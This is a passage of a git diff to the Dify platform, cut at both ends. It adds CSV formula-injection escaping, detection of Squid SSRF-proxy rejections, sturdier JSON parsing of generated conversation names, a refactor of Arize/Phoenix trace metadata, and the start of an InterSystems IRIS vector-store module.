str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. 
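+ Only top-level values are rewritten; the input is copied shallowly and nested structures are not traversed.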
+ + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. 
" + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/llm_generator/llm_generator.py b/api/core/llm_generator/llm_generator.py index 4a577e6c38..b4c3ec1caf 100644 --- a/api/core/llm_generator/llm_generator.py +++ b/api/core/llm_generator/llm_generator.py @@ -72,15 +72,22 @@ class LLMGenerator: prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False ) answer = cast(str, response.message.content) - cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL) - if cleaned_answer is None: + if answer is None: return "" try: - result_dict = json.loads(cleaned_answer) - answer = result_dict["Your Output"] + result_dict = json.loads(answer) except json.JSONDecodeError: - logger.exception("Failed to generate name after answer, use query instead") + result_dict = json_repair.loads(answer) + + if not isinstance(result_dict, dict): answer = query + else: + output = result_dict.get("Your Output") + if isinstance(output, str) and output.strip(): + answer = output.strip() + else: + answer = query + name = answer.strip() if len(name) > 75: diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime to nanoseconds since epoch. 
If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metatada to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), 
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + 
llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = 
wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: 
json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - 
"tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": self.project, - "message_id": trace_info.message_id, - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: 
trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." 
+ f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes diff --git a/api/core/rag/datasource/vdb/iris/__init__.py b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. 
+""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = 